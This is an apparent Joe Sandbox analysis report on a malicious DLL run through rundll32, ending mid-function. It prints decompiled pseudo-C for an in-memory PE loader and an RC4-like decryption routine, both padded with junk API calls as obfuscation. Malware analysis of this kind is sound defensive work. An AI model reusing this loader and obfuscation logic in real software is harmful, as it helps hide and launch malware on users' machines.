Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001899
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100018BE

FindResourceW.KERNELBASE(?,00003275,10036C5C), ref: 100049EB
LoadResource.KERNEL32(?,00000000), ref: 100049FA
SizeofResource.KERNEL32(?,?), ref: 10004A0C
GetCurrencyFormatW.KERNEL32 ref: 10004A2A
GetCurrencyFormatW.KERNEL32 ref: 10004A49
GetCurrencyFormatW.KERNEL32 ref: 10004A62
VirtualAllocExNuma.KERNEL32(000000FF,00000000,?,?), ref: 10004A7C
GetCurrencyFormatW.KERNEL32 ref: 10004A84
GetCurrencyFormatW.KERNEL32 ref: 10004AA2
GetCurrencyFormatW.KERNEL32 ref: 10004ABB
VirtualAlloc.KERNEL32(00000000,?,?), ref: 10004AD3
memcpy.MSVCRT ref: 10004AE5
malloc.MSVCRT ref: 10004AF0
??3@YAXPAX@Z.MSVCRT ref: 10004B2F
_printf.LIBCMT ref: 10004B60

Strings

c, xrefs: 10004707
d, xrefs: 10004777
3, xrefs: 1000450F
t, xrefs: 100045D3
k, xrefs: 10004467
n, xrefs: 100045B7
d, xrefs: 1000465F
l, xrefs: 100044F3
l, xrefs: 1000460B
d, xrefs: 100045EF
t, xrefs: 1000473F
r, xrefs: 1000449C
l, xrefs: 10004694
l, xrefs: 10004598
m, xrefs: 100046B3
l, xrefs: 100047A3
e, xrefs: 100044D7
u+OUr@Gnw7WU8wvzF2sdn!scsb&WO4vzuGAs+!StYXj!by7msWucK*_MI_o)m(, xrefs: 10004AF8
., xrefs: 1000475B
., xrefs: 10004643
l, xrefs: 10004790
xadqsavcbdfewescGADW, xrefs: 10004333, 10004338, 10004460, 1000447C, 10004498, 100044B4, 100044D0, 100044EC, 10004508, 10004524, 10004540, 1000455C, 10004578, 10004594, 100045B0, 100045CC, 100045E8, 10004604, 10004620, 1000463C, 10004658, 10004674, 10004690, 100046AC, 100046C8, 100046E4, 10004700, 1000471C, 10004738, 10004754, 10004770, 1000478C, 10004A17, 10004A44, 10004A5B, 10004A92, 10004AB4
d, xrefs: 10004563
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 1000433A, 1000433F, 10004463, 1000447F, 1000449B, 100044B7, 100044D3, 100044EF, 1000450B, 10004527, 10004543, 1000455F, 1000457B, 10004597, 100045B3, 100045CF, 100045EB, 10004607, 10004623, 1000463F, 1000465B, 10004677, 10004693, 100046AF, 100046CB, 100046E7, 10004703, 1000471F, 1000473B, 10004757, 10004773, 1000478F, 10004A25, 10004A46, 10004A5F, 10004A95, 10004AB8
n, xrefs: 100044BB
l, xrefs: 1000457F
v, xrefs: 100046EB
s, xrefs: 100046CF
e, xrefs: 10004483
., xrefs: 10004547

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat$Resource$AllocVirtual$??3@FindLoadNumaSizeof_malloc_printfmallocmemcpy
String ID: .$.$.$3$c$d$d$d$d$e$e$eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$k$l$l$l$l$l$l$l$m$n$n$r$s$t$t$u+OUr@Gnw7WU8wvzF2sdn!scsb&WO4vzuGAs+!StYXj!by7msWucK*_MI_o)m($v$xadqsavcbdfewescGADW
API String ID: 3325861097-4060776750
Opcode ID: 66ea2a91fe368a831aadb18a4e90e5ef0f40db8b5cb4f279c8b13da558b103b3
Instruction ID: abf1217519c19ffa8c1e819e0abff0726c6fc8cdfe709489ff9e1ea74d27783b
Opcode Fuzzy Hash: 66ea2a91fe368a831aadb18a4e90e5ef0f40db8b5cb4f279c8b13da558b103b3
Instruction Fuzzy Hash: 8922A074544314BAF315DB91CE8AF0BBBECEF8A744F015509F740AA2A0D772A5248F6B

Uniqueness

Uniqueness Score: -1.00%

Function 100039A9 Relevance: 111.0, APIs: 60, Strings: 3, Instructions: 767
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E100039A9(void* __eflags, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* _v0;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				int _v48;
				intOrPtr* _v52;
				int _v56;
				int _v60;
				intOrPtr* _v64;
				void* __esi;
				signed int _t155;
				signed int _t166;
				signed int _t186;
				int _t187;
				signed int _t193;
				signed int _t198;
				void* _t202;
				signed int _t205;
				signed int _t210;
				int _t223;
				signed int _t224;
				signed int _t227;
				intOrPtr* _t234;
				signed int _t235;
				intOrPtr _t238;
				signed int _t242;
				signed int _t275;
				signed int _t283;
				signed short* _t286;
				intOrPtr* _t302;
				signed int _t306;
				intOrPtr* _t307;
				signed int _t308;
				signed int _t323;
				int _t336;
				int _t343;
				intOrPtr* _t407;
				short* _t447;
				int* _t448;
				int* _t449;

				_t448 =  &_v60;
				_t447 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v44 = 0;
				_t155 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
				if(E10001E20(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + _a8, _t155 *  *0x100440d0 + 0x40) != 0) {
					if(( *_a4 & 0x0000ffff) != GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x5a4d) {
						goto L1;
					}
					_t166 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
					if(E10001E20(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + _a8, _t166 *  *0x100440d8 + _a4[0x1e] + 0xf8) == 0) {
						goto L1;
					}
					_v56 = _a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + _a4[0x1e];
					if( *_v56 != GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + 0x4550 || ( *(_v56 + 4) & 0x0000ffff) != GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + 0x14c || ( *(_v56 + 0x38) & GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + 0x00000001) != 0) {
						goto L1;
					} else {
						_t186 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t187 = _v56;
						_v40 =  *((intOrPtr*)(_t187 + 0x38));
						_v52 = ( *(_t187 + 0x14) & 0x0000ffff) + _t186 *  *0x100440d8 * 0x28 + _t187 + 0x18;
						_v48 = 0;
						if(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + ( *(_v56 + 6) & 0x0000ffff) == 0) {
							L15:
							_t193 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							 *0x10046a40(); // executed
							_t198 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_t202 = E10001DE9(_t198 *  *0x100440e0 + _v36, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v60 + 0x50)));
							 *_t448 = 0x22b9;
							_v52 = _t202 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", _t448 + 0x28 + _t193 *  *0x100440d8 * 0x24) *  *0x100440d8;
							_t205 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							if(_v52 != E10001DE9(_t205 *  *0x100440e0 + _v36, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + _v48)) {
								goto L1;
							}
							_t210 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_v44 = _t210 *  *0x100440d4 + 0x2000;
							_t223 = _a8(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v60 + 0x34)), _v52, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + 0x00001000 | _v44, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 4, _a28);
							_t449 =  &(_t448[5]);
							_v56 = _t223;
							if(_t223 != 0) {
								L18:
								_t224 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
								_t227 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
								_v44 = HeapAlloc(GetProcessHeap(), _t227 *  *0x100440dc + 8, _t224 *  *0x100440d0 + 0x40);
								_t234 = _v44 + (GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 6);
								_v64 = _t234;
								if(_t234 != 0) {
									 *((intOrPtr*)(_t234 + 4)) = _v56;
									_t235 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									_t238 = _v64;
									asm("sbb ecx, ecx");
									 *(_t238 + 0x14) =  ~( ~(_t235 *  *0x100440dc + 0x00002000 &  *(_v60 + 0x16) & 0x0000ffff));
									 *((intOrPtr*)(_t238 + 0x1c)) = _a8;
									 *((intOrPtr*)(_t238 + 0x20)) = _a12;
									 *((intOrPtr*)(_t238 + 0x24)) = _a16;
									 *((intOrPtr*)(_t238 + 0x28)) = _a20;
									 *((intOrPtr*)(_t238 + 0x2c)) = _a24;
									 *((intOrPtr*)(_t238 + 0x34)) = _a28;
									 *((intOrPtr*)(_v64 + 0x3c)) = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + _v36;
									_t242 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									if(E10001E20(_a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8, _t242 *  *0x100440cc +  *((intOrPtr*)(_v60 + 0x54))) == 0) {
										L28:
										E10003567(_v64);
										goto L1;
									}
									_v48 = _a8(_v56, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *((intOrPtr*)(_v60 + 0x54)), GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + 0x1000, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 4, _a28);
									memcpy(_v48, _v0, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v60 + 0x54)));
									_v44 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 * 0xf8;
									 *_v64 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + _v44 + _v48 +  *((intOrPtr*)(_v0 + 0x3c));
									 *((intOrPtr*)( *_v64 + 0x34)) = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + _v56;
									_t275 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									if(E10001E51(_v0, _a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8, _v60, (_t275 *  *0x100440d0 << 6) + _v64) == 0) {
										goto L28;
									}
									_t283 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									_t407 = _v64;
									_t286 = _t283 *  *0x100440cc +  *((intOrPtr*)( *_t407 + 0x34)) -  *((intOrPtr*)(_v60 + 0x34));
									_a4 = _t286;
									if(_t286 == 0) {
										 *((intOrPtr*)(_t407 + 0x18)) = 1;
									} else {
										_t308 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
										_a4 = E1000290C((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 6) + _v64, _a4 + _t308 *  *0x100440d8);
										 *((intOrPtr*)(_v64 + 0x18)) = _a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0;
									}
									if(E10002BDE((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 << 6) + _v64) == 0 || E10002482((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 6) + _v64) == 0 || E10002863((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 << 6) + _v64) == 0) {
										goto L28;
									} else {
										_t302 = _v64;
										if( *((intOrPtr*)( *_t302 + 0x28)) == 0) {
											 *((intOrPtr*)(_t302 + 0x38)) = 0;
											return _t302;
										}
										_push(0x22b9);
										_push(L"xadqsavcbdfewescGADW");
										_push(0);
										_push(_t447);
										_push(0x11d4);
										_push(0);
										if( *((intOrPtr*)(_t302 + 0x14)) == 0) {
											 *((intOrPtr*)(_v64 + 0x38)) = GetCurrencyFormatW() *  *0x100440d0 +  *((intOrPtr*)( *_v64 + 0x28)) + _v56;
										} else {
											_t306 = GetCurrencyFormatW();
											_t307 = _v64;
											 *0x10046a88 = _t306 *  *0x100440d0 +  *((intOrPtr*)( *_t307 + 0x28)) + _v56;
											 *((intOrPtr*)(_t307 + 0x10)) = 1;
										}
										return _v64;
									}
								}
								_a12(_v56, 0, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + 0x8000, _a28);
								goto L1;
							}
							_t323 = GetCurrencyFormatW(_t223, 0x11d4, _t447, _t223, L"xadqsavcbdfewescGADW", 0x22b9);
							_v44 = _t323 *  *0x100440d0 + 0x2000;
							_t336 = _a8(0, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + _v52, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x00001000 | _v44, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + 4, _a28);
							_t449 =  &(_t449[5]);
							_v56 = _t336;
							if(_t336 == 0) {
								goto L1;
							}
							goto L18;
						}
						_v52 = _v52 + 0xc;
						do {
							_push(0x22b9);
							_push(L"xadqsavcbdfewescGADW");
							_push(0);
							_push(_t447);
							_push(0x11d4);
							_push(0);
							if( *((intOrPtr*)(_v52 + 4)) != 0) {
								_t343 = GetCurrencyFormatW() *  *0x100440d4 +  *_v52 +  *((intOrPtr*)(_v52 + 4));
							} else {
								_t343 = GetCurrencyFormatW() *  *0x100440d4 +  *_v52 + _v40;
							}
							_v60 = _t343;
							if(_v60 > GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + _v44) {
								_v44 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc + _v60;
							}
							_v48 = _v48 + 1;
							_v52 = _v52 + 0x28;
						} while (_v48 < GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + ( *(_v56 + 6) & 0x0000ffff));
						goto L15;
					}
				}
				L1:
				return 0;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 100039D5
GetCurrencyFormatW.KERNEL32 ref: 100039EE

Part of subcall function 10001E20: GetCurrencyFormatW.KERNEL32 ref: 10001E38

GetCurrencyFormatW.KERNEL32 ref: 10003A1A
GetCurrencyFormatW.KERNEL32 ref: 10003A3F
GetCurrencyFormatW.KERNEL32 ref: 10003A63
GetCurrencyFormatW.KERNEL32 ref: 10003A88
GetCurrencyFormatW.KERNEL32 ref: 10003AAA
GetCurrencyFormatW.KERNEL32 ref: 10003AD0
GetCurrencyFormatW.KERNEL32 ref: 10003AFA
GetCurrencyFormatW.KERNEL32 ref: 10003B1D

Strings

xadqsavcbdfewescGADW, xrefs: 100039BC, 100039E3, 10003A0F, 10003A34, 10003A58, 10003A7D, 10003A96, 10003AC5, 10003AEF, 10003B12, 10003B39, 10003B7D, 10003BB5, 10003BD8, 10003BFE, 10003C27, 10003C4A, 10003C69, 10003C91, 10003CAC, 10003CD1, 10003D00, 10003D1E, 10003D3B, 10003D5E, 10003D8E, 10003DAA, 10003DC7, 10003DE6, 10003E15, 10003E2E, 10003E54, 10003E82, 10003EB2, 10003EFB, 10003F30, 10003F50, 10003F7D, 10003F96, 10003FB1, 10003FD9, 1000400B, 10004026, 10004052, 10004073, 10004097, 100040C5, 100040F0, 1000410A, 1000412E, 1000415D, 10004184, 100041AB, 100041F1
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 100039C4, 100039C9, 100039EA, 10003A16, 10003A3B, 10003A5F, 10003A84, 10003A9D, 10003ACC, 10003AF6, 10003B19, 10003B45, 10003B88, 10003BBC, 10003BDF, 10003C05, 10003C2E, 10003C51, 10003C70, 10003C98, 10003CB3, 10003CD8, 10003D07, 10003D25, 10003D42, 10003D65, 10003D94, 10003DB1, 10003DCE, 10003DED, 10003E1C, 10003E35, 10003E5B, 10003E8A, 10003EB9, 10003F10, 10003F37, 10003F57, 10003F84, 10003F9D, 10003FB8, 10003FE0, 10004012, 1000402D, 10004059, 1000407A, 1000409E, 100040CC, 100040F7, 10004111, 10004135, 10004164, 1000418B, 100041B2, 100041F7
(, xrefs: 10003BF8

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: ($eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-2712681272
Opcode ID: 6358d7462f08fcbe04848fd00b87f20519dc6db130516a4512fa2fb5f1ed022f
Instruction ID: be84b0d19bb5b2932066f15e7eca2fa00d7c74bd76f66a19a1550838f82622ea
Opcode Fuzzy Hash: 6358d7462f08fcbe04848fd00b87f20519dc6db130516a4512fa2fb5f1ed022f
Instruction Fuzzy Hash: 06428BB1604215BFE314DB91CD82FA7BFACEB8B788F024409F705DB292D771E8548A65

Uniqueness

Uniqueness Score: -1.00%

Function 100018D8 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 194
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E100018D8(signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				intOrPtr* _v4;
				void* _v8;
				int _v12;
				void* _t78;
				signed int _t89;
				signed int _t111;
				signed int _t116;
				signed int _t117;
				signed int _t120;
				int _t129;
				short* _t159;

				_t129 = 0x22b9;
				_t159 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v12 = 0;
				_a8 = _a4 - _a12 + _a8;
				_t78 = malloc(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a8 *  *0x100440d0 + 0x4708); // executed
				_v8 = _t78;
				_a12 = 0;
				if(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a8 *  *0x100440e0 + 0x4708 > 0) {
					do {
						_t116 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
						_t117 = _a12;
						 *(_t116 * _a8 *  *0x100440d0 + _t117 + _a16) = _t117;
						_a4 = _t117 % _a24;
						_t120 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
						_t129 = 0x22b9;
						 *((char*)(_v8 + _t120 * _a8 *  *0x100440d8 + _a12)) =  *((intOrPtr*)(_a4 + _a20));
						GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_a12 = _a12 + 1;
					} while (_a12 < GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a8 *  *0x100440e0 + 0x4708);
				}
				_a12 = _a12 & 0x00000000;
				do {
					_a4 =  *((char*)(_v8 + GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440d4 + _a12));
					_t89 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
					asm("cdq");
					_v12 = (( *(_t89 * _a8 *  *0x100440d8 + _a12 + _a16) & 0x000000ff) + _a4 + _v12) % 0x4708;
					_a4 =  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440e0 + _a12 + _a16));
					_v4 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440e0 + _v12 + _a16;
					 *((char*)(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440d0 + _a12 + _a16)) =  *_v4;
					_t111 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
					_a12 = _a12 + 1;
					 *((char*)(_t111 * _a8 *  *0x100440dc + _v12 + _a16)) = _a4;
				} while (_a12 < 0x4708);
				return  *0x10046a64(_v8);
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001916
malloc.MSVCRT ref: 1000192A
GetCurrencyFormatW.KERNEL32 ref: 10001945
GetCurrencyFormatW.KERNEL32 ref: 1000196C
GetCurrencyFormatW.KERNEL32 ref: 100019A1
GetCurrencyFormatW.KERNEL32 ref: 100019D6
GetCurrencyFormatW.KERNEL32 ref: 100019E8
GetCurrencyFormatW.KERNEL32 ref: 10001A16
GetCurrencyFormatW.KERNEL32 ref: 10001A40
GetCurrencyFormatW.KERNEL32 ref: 10001A7A
GetCurrencyFormatW.KERNEL32 ref: 10001AA3
GetCurrencyFormatW.KERNEL32 ref: 10001AC9
GetCurrencyFormatW.KERNEL32 ref: 10001AF4
??3@YAXPAX@Z.MSVCRT ref: 10001B27

Strings

xadqsavcbdfewescGADW, xrefs: 100018F7, 10001932, 10001961, 10001990, 100019C8, 100019DD, 10001A0B, 10001A31, 10001A6B, 10001A94, 10001ABA, 10001AE6
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 100018FF, 10001904, 1000193E, 10001968, 10001997, 100019CF, 100019E4, 10001A12, 10001A38, 10001A72, 10001A9B, 10001AC1, 10001AED

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat$??3@malloc
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 203256951-3161301136
Opcode ID: a0604d6b19201fa23fe871278798098373fce57cb70cfb09eb1f26b7c660e828
Instruction ID: fba73ffc0b4bb754e4a8c3637f8b73e63a87aae8de5c3fee8d95280e19d6a203
Opcode Fuzzy Hash: a0604d6b19201fa23fe871278798098373fce57cb70cfb09eb1f26b7c660e828
Instruction Fuzzy Hash: 9F615A71508350AFE304DB11CD91F5BBFE9EBCA748F05590EF684AB2A1C731EA148E26

Uniqueness

Uniqueness Score: -1.00%

Function 1000227A Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 172
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E1000227A(void** __ebx, intOrPtr* _a4) {
				signed int _v8;
				signed int _t47;
				signed int _t48;
				signed int _t49;
				signed int _t60;
				signed int _t66;
				signed int _t68;
				int _t74;
				void** _t84;
				short* _t103;
				void* _t119;

				_t84 = __ebx;
				if(__ebx[2] != 0) {
					_t106 = 0x22b9;
					if((__ebx[3] & GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x02000000) == 0) {
						_t47 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
						asm("sbb esi, esi");
						_t48 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
						asm("sbb edi, edi");
						_t49 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
						asm("sbb eax, eax");
						_t103 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
						_v8 =  *((intOrPtr*)(0x10046a90 + ( ~( ~(_t49 *  *0x100440e0 - 0x80000000 & __ebx[3])) + ( ~( ~(_t48 *  *0x100440e0 + 0x40000000 & __ebx[3])) +  ~( ~(_t47 *  *0x100440d4 + 0x20000000 & __ebx[3])) * 2) * 2) * 4));
						if((__ebx[3] & GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x04000000) != 0) {
